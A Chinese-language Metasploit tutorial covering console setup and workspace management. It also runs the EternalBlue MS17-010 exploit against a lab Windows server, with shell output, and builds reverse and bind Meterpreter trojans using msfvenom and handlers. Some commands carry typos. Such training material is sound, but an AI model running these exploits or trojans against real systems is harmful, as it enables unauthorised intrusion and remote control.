一、配置metasploit環境
1.自定義命令提示符
msf5 > set Prompt my-msf Prompt => my-msf my-msf >
除了指定字符串,還可以使用以下格式:
%D 當前目錄 %H 主機名 %J 當前正運行的工作數量 %L 本地IP地址 %S 當前打開的會話數 %T 時間戳(set PromptTimeFormat %Y-%m-%d修改格式) %U 當前使用的用戶名稱 %W 當前所處的工作區
除了修改命令提示符內容,還可以修改">"為其他符號:
my-msf > set PromptChar $ PromptChar => $ my-msf $
2.開啟計時功能
當我們執行任務時,為了了解每一步操作發生的時間,需要具備計時功能。
my-msf $ set TimestampOutput true TimestampOutput => true
true為開啟計時功能,false為關閉。
3.開啟日志記錄
當我們需要對操作進行日志記錄時,可以開啟日志記錄功能(默認是關閉的):
my-msf $ set ConsoleLogging true Console logging is now enabled. ConsoleLogging => true
這樣,我們所做的操作都會被記錄到 /root/.msf4/logs/console.log 中(從開啟日志功能后開始記錄)。
4.開啟會話日志
第3節中所開啟的是console的日志(即運行命令時的記錄),而當我們攻擊成功后,獲得了會話連接,則需要記錄連接的日志。
msf5 > set SessionLogging true Session logging will be enabled for future sessions. SessionLogging => true
5.設置日志級別
msf5 > set LogLevel 2 LogLevel => 2
日志級別為0、1、2、3,值越高,內容越詳細。
6.模塊級別
對於exploit模塊,Metasploit根據模塊使用容易程度和對目標系統的潛在影響程度,對模塊進行了分級。
1951 windows/tftp/threectftpsvc_long_mode 2006-11-27 great No 3CTftpSvc TFTP Long Mode Buffer Overflow 1952 windows/unicenter/cam_log_security 2005-08-22 great Yes CA CAM log_security() Stack Buffer Overflow (Win32) 1953 windows/vnc/realvnc_client 2001-01-29 normal No RealVNC 3.3.7 Client Buffer Overflow 1954 windows/vnc/ultravnc_client 2006-04-04 normal No UltraVNC 1.0.1 Client Buffer Overflow 1955 windows/vnc/ultravnc_viewer_bof 2008-02-06 normal No UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow 1956 windows/vnc/winvnc_http_get 2001-01-29 average No WinVNC Web Server GET Overflow 1957 windows/vpn/safenet_ike_11 2009-06-01 average No SafeNet SoftRemote IKE Service Buffer Overflow 1958 windows/winrm/winrm_script_exec 2012-11-01 manual No WinRM Script Exec Remote Code Execution 1959 windows/wins/ms04_045_wins 2004-12-14 great Yes MS04-045 Microsoft WINS Service Memory Overwrite
| 排名 | 對應值 | 含義 |
| Manual | 0 | 難以攻擊成功的模塊 |
| Low | 100 | 基本不可能成功,成功率低於5% |
| Average | 200 | 一般不會成功 |
| Normal | 300 | 在特定版本中可以被利用成功 |
| Good | 400 | 一般會成功 |
| Great | 500 | 會自動檢測到可利用的目標,成功率很高 |
| Excellent | 600 | 不會使服務器崩潰,基本可以放心使用,適用於SQL注入、CMD執行、RFI、LFI等 |
有些模塊可能沒有被設置級別,如果我們發現其比較好用,可以使用以下命令給其設置一個級別:
set MinimumRank 300 # 先執行use xxx/xxx/xxx
二、MSF基本使用
1.工作區管理
1)查看工作區
msf5 > workspace
* default
2)添加工作區
msf5 > workspace -a work1 [*] Added workspace: work1 [*] Workspace: work1
3)查看工作區詳細信息
msf5 > workspace -v Workspaces ========== current name hosts services vulns creds loots notes ------- ---- ----- -------- ----- ----- ----- ----- default 7 4 1 0 0 2 work1 0 0 0 0 0 0 work2 0 0 0 0 0 0 * work3 0 0 0 0 0 0
name:工作區名稱。
hosts:工作區記錄的主機數。
services:工作區記錄的服務數。
vulns:工作區記錄的漏洞信息數。
creds:工作區記錄的認證信息數。
loots:工作區記錄的戰利品數。
notes:工作區記錄的備注信息數。
4)切換工作區
msf5 > workspace work2
[*] Workspace: work2
5)重命名工作區
msf5 > workspace -r work3 my_work [*] Renamed workspace 'work3' to 'my_work'
6)刪除工作區
msf5 > workspace -d my_work [*] Deleted workspace: my_work
刪除所有工作區(包含當前的default工作區,刪除完后重新創建一個新的default工作區):
msf5 > workspace -D [*] Deleted workspace: default [*] Recreated the default workspace [*] Deleted workspace: work1 [*] Deleted workspace: work2 [*] Switched to workspace: default msf5 > workspace * default
2.確定目標主機
1)使用nmap掃描目標主機
msf5 > db_nmap -sP 192.168.4.0/24 [*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-24 02:40 EDT [*] Nmap: Nmap scan report for 17WiFi.lan (192.168.4.1) [*] Nmap: Host is up (0.00042s latency). [*] Nmap: MAC Address: 4C:6E:6E:00:EF:E8 (Comnect Technology) [*] Nmap: Nmap scan report for DESKTOP-6MQMP8A.lan (192.168.4.42) [*] Nmap: Host is up (0.0017s latency). [*] Nmap: MAC Address: B4:2E:99:EE:74:35 (Giga-byte Technology) [*] Nmap: Nmap scan report for 192.168.4.52 [*] Nmap: Host is up (0.00012s latency). [*] Nmap: MAC Address: 00:0C:29:FA:DD:2A (VMware) [*] Nmap: Nmap scan report for 192.168.4.199 [*] Nmap: Host is up (0.00016s latency). [*] Nmap: MAC Address: B4:2E:99:EE:73:E0 (Giga-byte Technology) [*] Nmap: Nmap scan report for 192.168.4.210 [*] Nmap: Host is up (0.00014s latency). [*] Nmap: MAC Address: 00:0C:29:7E:61:77 (VMware) [*] Nmap: Nmap scan report for 192.168.4.211 [*] Nmap: Host is up (0.00014s latency). [*] Nmap: MAC Address: 00:0C:29:C8:38:DE (VMware) [*] Nmap: Nmap scan report for parrot.lan (192.168.4.219) [*] Nmap: Host is up (0.028s latency). [*] Nmap: MAC Address: 60:D8:19:C4:C4:32 (Hon Hai Precision Ind.) [*] Nmap: Nmap scan report for kali.lan (192.168.4.146) [*] Nmap: Host is up. [*] Nmap: Nmap done: 256 IP addresses (8 hosts up) scanned in 1.31 seconds
msf5 > workspace -v Workspaces ========== current name hosts services vulns creds loots notes ------- ---- ----- -------- ----- ----- ----- ----- * default 8 0 0 0 0 0
使用db_nmap來調用nmap模塊,使用方法和Nmap命令一樣。掃描完畢后,可以看到當前工作區中以發現的主機有8台。
2)導入第三方掃描報告
查看支持的報告種類:
msf5 > db_import Usage: db_import <filename> [file2...] Filenames can be globs like *.xml, or **/*.xml which will search recursively Currently supported file types include: Acunetix Amap Log Amap Log -m Appscan Burp Session XML Burp Issue XML CI Foundstone FusionVM XML Group Policy Preferences Credentials IP Address List IP360 ASPL IP360 XML v3 Libpcap Packet Capture Masscan XML Metasploit PWDump Export Metasploit XML Metasploit Zip Export Microsoft Baseline Security Analyzer NeXpose Simple XML NeXpose XML Report Nessus NBE Report Nessus XML (v1) Nessus XML (v2) NetSparker XML Nikto XML Nmap XML OpenVAS Report OpenVAS XML Outpost24 XML Qualys Asset XML Qualys Scan XML Retina XML Spiceworks CSV Export Wapiti XML
導入nmap生成的XML文件:
msf5 > db_import subnet.xml [*] Importing 'Nmap XML' data [*] Import: Parsing with 'Nokogiri v1.10.7' [*] Importing host 192.168.4.1 [*] Importing host 192.168.4.42 [*] Importing host 192.168.4.52 [*] Importing host 192.168.4.199 [*] Importing host 192.168.4.210 [*] Importing host 192.168.4.211 [*] Importing host 192.168.4.146 [*] Successfully imported /root/subnet.xml
3)查看工作區中有哪些主機
msf5 > hosts Hosts ===== address mac name os_name os_flavor os_sp purpose info comments ------- --- ---- ------- --------- ----- ------- ---- -------- 192.168.4.1 4c:6e:6e:00:ef:e8 17WiFi.lan Unknown device 192.168.4.42 b4:2e:99:ee:74:35 DESKTOP-6MQMP8A.lan Unknown device 192.168.4.52 00:0c:29:fa:dd:2a Unknown device 192.168.4.146 kali.lan Unknown device 192.168.4.199 b4:2e:99:ee:73:e0 Unknown device 192.168.4.210 00:0c:29:7e:61:77 Unknown device 192.168.4.211 00:0c:29:c8:38:de Unknown device
4)從導入的報告中分析漏洞
如果我們導入的第三方報告中包含主機的漏洞信息,則可以直接對其進行分析:
msf5 > analyze 192.168.4.211 [*] Analyzing 192.168.4.211... [*] No suggestions for 192.168.4.211.
這里可以看到,我們導入的報告中沒有192.168.4.211的漏洞信息。
使用workspace -v可以查看不存在vulns:
msf5 > workspace -v Workspaces ========== current name hosts services vulns creds loots notes ------- ---- ----- -------- ----- ----- ----- ----- * default 7 0 0 0 0 7
假設某個主機在報告中存在漏洞,則使用analyze分析后,metasploit會給出對應漏洞的攻擊腳本路徑。例如 exploit/windows/smb/ms04_011_lsass 。
3.管理目標主機
針對我們掃描到的目標主機,不是每一個主機都作為滲透攻擊的目標,則需要我們對其進行管理。
1)hosts命令
命令格式: hosts [options] [addr1 addr2 ...]
msf5 > hosts -h Usage: hosts [ options ] [addr1 addr2 ...] OPTIONS: -a,--add Add the hosts instead of searching -d,--delete Delete the hosts instead of searching -c <col1,col2> Only show the given columns (see list below) -C <col1,col2> Only show the given columns until the next restart (see list below) -h,--help Show this help information -u,--up Only show hosts which are up -o <file> Send output to a file in csv format -O <column> Order rows by specified column number -R,--rhosts Set RHOSTS from the results of the search -S,--search Search string to filter by -i,--info Change the info of a host -n,--name Change the name of a host -m,--comment Change the comment of a host -t,--tag Add or specify a tag to a range of hosts Available columns: address, arch, comm, comments, created_at, cred_count, detected_arch, exploit_attempt_count, host_detail_count, info, mac, name, note_count, os_family, os_flavor, os_lang, os_name, os_sp, purpose, scope, service_count, state, updated_at, virtual_host, vuln_count, tags
2)hosts顯示方式
顯示指定的列:
msf5 > hosts -c address,mac Hosts ===== address mac ------- --- 192.168.4.1 4c:6e:6e:00:ef:e8 192.168.4.42 b4:2e:99:ee:74:35 192.168.4.52 00:0c:29:fa:dd:2a 192.168.4.146 192.168.4.199 b4:2e:99:ee:73:e0 192.168.4.210 00:0c:29:7e:61:77 192.168.4.211 00:0c:29:c8:38:de
注意,這里的 -c 如果換成 -C ,則會一直生效,直到重啟數據庫。
顯示up的主機:
msf5 > hosts -u
按某一列進行排序:
msf5 > hosts -O 2 Hosts ===== address mac name os_name os_flavor os_sp purpose info comments ------- --- ---- ------- --------- ----- ------- ---- -------- 192.168.4.146 kali.lan Unknown device 192.168.4.210 00:0c:29:7e:61:77 Unknown device 192.168.4.211 00:0c:29:c8:38:de Unknown device 192.168.4.52 00:0c:29:fa:dd:2a Unknown device 192.168.4.1 4c:6e:6e:00:ef:e8 17WiFi.lan Unknown device 192.168.4.199 b4:2e:99:ee:73:e0 Unknown device 192.168.4.42 b4:2e:99:ee:74:35 DESKTOP-6MQMP8A.lan Unknown device
可以看到,以上是按第二列mac進行排序。
3)添加tags和info
我們為了標識某個主機,可以為其添加一個tag或info:
msf5 > hosts 192.168.4.199 -t important msf5 > hosts 192.168.4.199 -i info199
msf5 > hosts -c address,info Hosts ===== address info ------- ---- 192.168.4.1 192.168.4.42 192.168.4.52 192.168.4.146 192.168.4.199 info199 192.168.4.210 192.168.4.211
4)修改主機名
msf5 > hosts 192.168.4.1 -n gateway msf5 > hosts Hosts ===== address mac name os_name os_flavor os_sp purpose info comments ------- --- ---- ------- --------- ----- ------- ---- -------- 192.168.4.1 4c:6e:6e:00:ef:e8 gateway Unknown device 192.168.4.42 b4:2e:99:ee:74:35 DESKTOP-6MQMP8A.lan Unknown device 192.168.4.52 00:0c:29:fa:dd:2a Unknown device 192.168.4.146 kali.lan Unknown device 192.168.4.199 b4:2e:99:ee:73:e0 Unknown device info199 192.168.4.210 00:0c:29:7e:61:77 Unknown device 192.168.4.211 00:0c:29:c8:38:de Unknown device
5)搜索主機
msf5 > hosts -S kali Hosts ===== address mac name os_name os_flavor os_sp purpose info comments ------- --- ---- ------- --------- ----- ------- ---- -------- 192.168.4.146 kali.lan Unknown device
使用-S搜索任意關鍵字(不區分大小寫)。
6)導出主機到文件
msf5 > hosts -o host.csv
[*] Wrote hosts to host.csv
4.管理工作區中其他對象
除了hosts,在工作區中還有services、creds(認證信息)、loots(戰利品)、notes(備注)、vulns(漏洞)。基本的管理流程和hosts相似,這里不做贅述。
5.備份數據
前面所述中,我們在管理hosts等信息時,可以使用-o導出csv文件,但只能對部分數據進行備份。如果想要備份整個工作區,則可以使用db_export:
msf5 > db_export -f xml keep.xml [*] Starting export of workspace default to keep.xml [ xml ]... [*] Finished export of workspace default to keep.xml [ xml ]...
可以看到保存的XML格式如下:
三、metasploit簡單使用
1.查詢漏洞模塊
msf5 > show exploits
可以列出當前版本metasploit所有的漏洞利用模塊。
1945 windows/tftp/netdecision_tftp_traversal 2009-05-16 excellent No NetDecision 4.2 TFTP Writable Directory Traversal Execution 1946 windows/tftp/opentftp_error_code 2008-07-05 average No OpenTFTP SP 1.4 Error Packet Overflow 1947 windows/tftp/quick_tftp_pro_mode 2008-03-27 good No Quick FTP Pro 2.1 Transfer-Mode Overflow 1948 windows/tftp/tftpd32_long_filename 2002-11-19 average No TFTPD32 Long Filename Buffer Overflow 1949 windows/tftp/tftpdwin_long_filename 2006-09-21 great No TFTPDWIN v0.4.2 Long Filename Buffer Overflow 1950 windows/tftp/tftpserver_wrq_bof 2008-03-26 normal No TFTP Server for Windows 1.4 ST WRQ Buffer Overflow 1951 windows/tftp/threectftpsvc_long_mode 2006-11-27 great No 3CTftpSvc TFTP Long Mode Buffer Overflow 1952 windows/unicenter/cam_log_security 2005-08-22 great Yes CA CAM log_security() Stack Buffer Overflow (Win32) 1953 windows/vnc/realvnc_client 2001-01-29 normal No RealVNC 3.3.7 Client Buffer Overflow 1954 windows/vnc/ultravnc_client 2006-04-04 normal No UltraVNC 1.0.1 Client Buffer Overflow 1955 windows/vnc/ultravnc_viewer_bof 2008-02-06 normal No UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow 1956 windows/vnc/winvnc_http_get 2001-01-29 average No WinVNC Web Server GET Overflow 1957 windows/vpn/safenet_ike_11 2009-06-01 average No SafeNet SoftRemote IKE Service Buffer Overflow 1958 windows/winrm/winrm_script_exec 2012-11-01 manual No WinRM Script Exec Remote Code Execution 1959 windows/wins/ms04_045_wins 2004-12-14 great Yes MS04-045 Microsoft WINS Service Memory Overwrite
2.使用一個漏洞(流程)
msf5 > use exploit/windows/smb/ms06_040_netapi
msf5 exploit(windows/smb/ms06_040_netapi) >
這些漏洞都是按類別分好的, 都存放在相應的目錄下,我們只需要use他就可以了。
這些漏洞模塊,一般是放在以下目錄的:
/usr/share/metasploit-framework/modules/exploits/
例如我們使用的ms04_031_netdde就是在這個目錄:
/usr/share/metasploit-framework/modules/exploits/windows/smb
查看漏洞如何使用:
msf5 exploit(windows/smb/ms06_040_netapi) > show info Name: MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow Module: exploit/windows/smb/ms06_040_netapi Platform: Windows Arch: Privileged: Yes License: Metasploit Framework License (BSD) Rank: Good Disclosed: 2006-08-08 Provided by: hdm <x@hdm.io> Module stability: crash-os-restarts crash-service-down Module reliability: unreliable-session Available targets: Id Name -- ---- 0 (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1) 1 (wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4 2 (wcscpy) Windows XP SP0/SP1 3 (stack) Windows XP SP1 English 4 (stack) Windows XP SP1 Italian 5 (wcscpy) Windows 2003 SP0 Check supported: No Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 445 yes The SMB service port (TCP) SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload information: Space: 370 Avoid: 7 characters Description: This module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that other RPC calls could be used to exploit this service. This exploit will result in a denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt will likely result in a complete reboot on Windows 2000 and the termination of all SMB-related services on Windows XP. The default target for this exploit should succeed on Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0. References: https://cvedetails.com/cve/CVE-2006-3439/ OSVDB (27845) http://www.securityfocus.com/bid/19409 https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2006/MS06-040
這里面特別要注意basic options,這是我們要使用這個漏洞,必須設置的一些選項。
選擇payload(show payloads):
msf5 exploit(windows/smb/ms06_040_netapi) > show payloads
可以看到很多可用的payloads,選擇一個需要的進行設置:
msf5 exploit(windows/smb/ms06_040_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
再對basic options進行設置(參照show info中所需的basic options):
msf5 exploit(windows/smb/ms06_040_netapi) > set RHOSTS 192.168.4.211 RHOSTS => 192.168.4.211
然后執行攻擊:
msf5 exploit(windows/smb/ms06_040_netapi) > exploit
使用exploit攻擊,或者使用run也可以。
使用back退出該漏洞使用:
msf5 exploit(windows/smb/ms06_040_netapi) > back
msf5 >
3.在漏洞模塊下查看help
在某個漏洞使用命令行下使用help會比在msf命令行下使用help,多以下部分內容:
msf5 exploit(windows/smb/ms06_040_netapi) > help Core Commands ============= Command Description ------- ----------- ? Help menu banner Display an awesome metasploit banner cd Change the current working directory color Toggle color connect Communicate with a host exit Exit the console get Gets the value of a context-specific variable getg Gets the value of a global variable grep Grep the output of another command help Help menu history Show command history load Load a framework plugin quit Exit the console repeat Repeat a list of commands route Route traffic through a session save Saves the active datastores sessions Dump session listings and display information about sessions set Sets a context-specific variable to a value setg Sets a global variable to a value sleep Do nothing for the specified number of seconds spool Write console output into a file as well the screen threads View and manipulate background threads unload Unload a framework plugin unset Unsets one or more context-specific variables unsetg Unsets one or more global variables version Show the framework and console library version numbers Module Commands =============== Command Description ------- ----------- advanced Displays advanced options for one or more modules back Move back from the current context info Displays information about one or more modules loadpath Searches for and loads modules from a path options Displays global options or for one or more modules popm Pops the latest module off the stack and makes it active previous Sets the previously loaded module as the current module pushm Pushes the active or list of modules onto the module stack reload_all Reloads all modules from all defined module paths search Searches module names and descriptions show Displays modules of a given type, or all modules use Interact with a module by name or search term/index Job Commands ============ Command Description ------- ----------- handler Start a payload handler as job jobs Displays and manages jobs kill Kill a job rename_job Rename a job Resource Script Commands ======================== Command Description ------- ----------- makerc Save commands entered since start to a file resource Run the commands stored in a file Database Backend Commands ========================= Command Description ------- ----------- analyze Analyze database information about a specific address or address range db_connect Connect to an existing data service db_disconnect Disconnect from the current data service db_export Export a file containing the contents of the database db_import Import a scan result file (filetype will be auto-detected) db_nmap Executes nmap and records the output automatically db_rebuild_cache Rebuilds the database-stored module cache (deprecated) db_remove Remove the saved data service entry db_save Save the current data service connection as the default to reconnect on startup db_status Show the current data service status hosts List all hosts in the database loot List all loot in the database notes List all notes in the database services List all services in the database vulns List all vulnerabilities in the database workspace Switch between database workspaces Credentials Backend Commands ============================ Command Description ------- ----------- creds List all credentials in the database Developer Commands ================== Command Description ------- ----------- edit Edit the current module or a file with the preferred editor irb Open an interactive Ruby shell in the current context log Display framework.log paged to the end if possible pry Open the Pry debugger on the current module or Framework reload_lib Reload Ruby library files from specified paths Exploit Commands ================ Command Description ------- ----------- check Check to see if a target is vulnerable exploit Launch an exploit attempt rcheck Reloads the module and checks if the target is vulnerable recheck Alias for rcheck reload Just reloads the module rerun Alias for rexploit rexploit Reloads the module and launches an exploit attempt run Alias for exploit msfconsole ========== `msfconsole` is the primary interface to Metasploit Framework. There is quite a lot that needs go here, please be patient and keep an eye on this space! Building ranges and lists ------------------------- Many commands and options that take a list of things can use ranges to avoid having to manually list each desired thing. All ranges are inclusive. ### Ranges of IDs Commands that take a list of IDs can use ranges to help. Individual IDs must be separated by a `,` (no space allowed) and ranges can be expressed with either `-` or `..`. ### Ranges of IPs There are several ways to specify ranges of IP addresses that can be mixed together. The first way is a list of IPs separated by just a ` ` (ASCII space), with an optional `,`. The next way is two complete IP addresses in the form of `BEGINNING_ADDRESS-END_ADDRESS` like `127.0.1.44-127.0.2.33`. CIDR specifications may also be used, however the whole address must be given to Metasploit like `127.0.0.0/8` and not `127/8`, contrary to the RFC. Additionally, a netmask can be used in conjunction with a domain name to dynamically resolve which block to target. All these methods work for both IPv4 and IPv6 addresses. IPv4 addresses can also be specified with special octet ranges from the [NMAP target specification](https://nmap.org/book/man-target-specification.html) ### Examples Terminate the first sessions: sessions -k 1 Stop some extra running jobs: jobs -k 2-6,7,8,11..15 Check a set of IP addresses: check 127.168.0.0/16, 127.0.0-2.1-4,15 127.0.0.255 Target a set of IPv6 hosts: set RHOSTS fe80::3990:0000/110, ::1-::f0f0 Target a block from a resolved domain name: set RHOSTS www.example.test/24
注意其中黃色部分的內容是漏洞模塊下使用help特有的部分,其余部分內容和在msf命令下使用help是一樣的。
4.生成木馬后門
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.4.146 LPORT=4444 -f exe > shell.exe
使用msfvenom命令來生成一個指定payload的木馬程序。
-p是指定payload類型。LHOST是控制端(我們的主機)的IP。LPORT是控制端的端口。
這個木馬如果被植入了被攻擊的主機,則這個程序會與我們給其指定的IP和端口進行連接,從而讓我們通過這個通道來執行我們的遠程控制命令。
注意這個payload對應着以下ruby文件:
/usr/share/metasploit-framework/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
5.監聽一個端口,等待反彈連接
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set LHOST 192.169.4.146 LHOST => 192.169.4.146 msf5 exploit(multi/handler) > set LPORT 4444 LPORT => 4444 msf5 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.4.146:4444
exploit/multi/handler是專門用來監聽反彈連接的模塊,我們運行它,然后設置LHOST和LPORT,也就是我們給木馬設置的連接IP和port,我們需要在本地進行監聽,等待木馬程序的連接。使用exploit或run開始監聽。
四、利用ms17-010漏洞攻擊windows server 2008 R2
1.查找漏洞ms17-010
msf5 > search ms17 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/admin/mssql/mssql_enum_domain_accounts normal No Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration 1 auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli normal No Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration 2 auxiliary/admin/mssql/mssql_enum_sql_logins normal No Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration 3 auxiliary/admin/mssql/mssql_escalate_execute_as normal No Microsoft SQL Server Escalate EXECUTE AS 4 auxiliary/admin/mssql/mssql_escalate_execute_as_sqli normal No Microsoft SQL Server SQLi Escalate Execute AS 5 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 6 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection 7 exploit/windows/fileformat/office_ms17_11882 2017-11-15 manual No Microsoft Office CVE-2017-11882 8 exploit/windows/smb/doublepulsar_rce 2017-04-14 great Yes DOUBLEPULSAR Payload Execution and Neutralization 9 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 10 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ 11 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2.使用漏洞
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) >
3.設置靶機IP
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.4.142 RHOST => 192.168.4.142
4.攻擊靶機
msf5 exploit(windows/smb/ms17_010_eternalblue) > run [*] Started reverse TCP handler on 192.168.4.146:4444 [*] 192.168.4.142:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 192.168.4.142:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7600 x64 (64-bit) [*] 192.168.4.142:445 - Scanned 1 of 1 hosts (100% complete) [*] 192.168.4.142:445 - Connecting to target for exploitation. [+] 192.168.4.142:445 - Connection established for exploitation. [+] 192.168.4.142:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.4.142:445 - CORE raw buffer dump (38 bytes) [*] 192.168.4.142:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2 [*] 192.168.4.142:445 - 0x00000010 30 30 38 20 52 32 20 44 61 74 61 63 65 6e 74 65 008 R2 Datacente [*] 192.168.4.142:445 - 0x00000020 72 20 37 36 30 30 r 7600 [+] 192.168.4.142:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.4.142:445 - Trying exploit with 12 Groom Allocations. [*] 192.168.4.142:445 - Sending all but last fragment of exploit packet [*] 192.168.4.142:445 - Starting non-paged pool grooming [+] 192.168.4.142:445 - Sending SMBv2 buffers [+] 192.168.4.142:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 192.168.4.142:445 - Sending final SMBv2 buffers. [*] 192.168.4.142:445 - Sending last fragment of exploit packet! [*] 192.168.4.142:445 - Receiving response from exploit packet [+] 192.168.4.142:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 192.168.4.142:445 - Sending egg to corrupted connection. [*] 192.168.4.142:445 - Triggering free of corrupted buffer. [*] Command shell session 1 opened (192.168.4.146:4444 -> 192.168.4.142:49159) at 2020-04-20 04:52:13 -0400 [+] 192.168.4.142:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.4.142:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.4.142:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= C:\Windows\system32>
可以看到,已經通過該漏洞反彈回windows的cmd了。
5.將會話放到后台
C:\Windows\system32>background Background session 1? [y/N] y msf5 exploit(windows/smb/ms17_010_eternalblue) > msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 1 [*] Starting interaction with 1... C:\Windows\system32>
使用background可以將已反彈的會話放到后台,或者使用Ctrl+Z快捷鍵。
通過sessions -i 1可以將會話返回前台。
我們可以查看所有的會話:
msf5 > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell x64/windows Microsoft Windows [_ 6.1.7600] _ (c) 2009 Microsoft Corporation_ C:\Windows\s... 192.168.4.146:4444 -> 192.168.4.142:49158 (192.168.4.142)
可以在msf命令行或者use exploits后的命令行中使用sessions查看已存在的會話。並通過sessions -i ID切換到對應的shell。
五、木馬滲透1(反向)
1.生成一個木馬(反向連接類型)
msfvenmon -p windows/meterpreter/reverse_tcp LHOST=192.168.4.146 LPORT=4444 -f exe > trojan_backward.exe
利用msfvenom生成一個木馬程序叫trojan_backward.exe,其中用到的payload是windows/meterpreter/reverse_tcp,這是一個反向連接方式的payload,LHOST是我們的攻擊機的IP地址,LPORT是攻擊機的端口(我們需要監聽的端口)。
2.在msf中監聽連接
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set LHOST 192.168.4.146 LHOST => 192.168.4.146 msf5 exploit(multi/handler) > set LPORT 4444 LPORT => 4444 msf5 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.4.146:4444
分別設置本機(攻擊機)的IP地址和需要監聽的端口(這個端口已經存在於生成的木馬中,木馬會主動連接這個端口)。
3.將木馬拷貝到靶機並運行(暫時關閉防火牆和AV)
在靶機運行木馬程序之后,可以看到攻擊機監聽的4444端口被連接,並且反彈了shell:
[*] Started reverse TCP handler on 192.168.4.146:4444 [*] Sending stage (180291 bytes) to 192.168.4.199 [*] Meterpreter session 1 opened (192.168.4.146:4444 -> 192.168.4.199:9018) at 2020-04-21 05:00:08 -0400 meterpreter >
在這個meterpreter命令行中,使用help查看可用的操作,例如執行ipconfig命令,screenshot命令(截屏)等。
4.使用64位的版本
前面我們默認使用的payload是32bit版本,如果要使用64位,則是windows/x64/meterpreter/reversetcp。
注意:如果生成木馬時使用的payload為64位,則在msf中使用exploit/multi/handler后,也要使用一下命令來指定64位的對應payload:
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
然后其他的操作都和32位一樣。
總結:版本的問題要保證木馬使用的payload要和msf的payload設置對應起來。這個操作適用於所有的payload。
六、木馬滲透2(正向)
1.生成一個木馬(正向連接類型)
sfvenom -p windows/x64/meterpreter/bind_tcp LHOST=192.168.4.199 LPORT=5555 -f exe > trojan_forward.exe
注意,這里的LHOST和reverse_tcp不一樣,這里的是靶機的IP地址,LPORT是靶機監聽的端口。
2.在msf中開始主動連接木馬
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp payload => windows/x64/meterpreter/bind_tcp msf5 exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/x64/meterpreter/bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LPORT 5555 yes The listen port RHOST no The target address Exploit target: Id Name -- ---- 0 Wildcard Target msf5 exploit(multi/handler) > set RHOST 192.168.4.199 RHOST => 192.168.4.199 msf5 exploit(multi/handler) > set LPORT 5555 LPORT => 4444 msf5 exploit(multi/handler) > run [*] Started bind TCP handler against 192.168.4.199:5555
其實也是先使用exploit/multi/handler,然后和反向連接方式不同的是要手工設置一下payload的類型,這里是windows/meterpreter/bind_tcp。
然后設置RHOST為靶機IP地址,LPORT為靶機監聽的端口5555,當我們的木馬被靶機用戶執行后,會監聽在5555端口,等待攻擊機的msf來連接。
3.在靶機上運行木馬
在靶機上運行木馬的操作也可以是在msf連接木馬之前(不影響效果)。
運行木馬后(木馬監聽靶機的5555端口),在msf這邊可以看到連接成功:
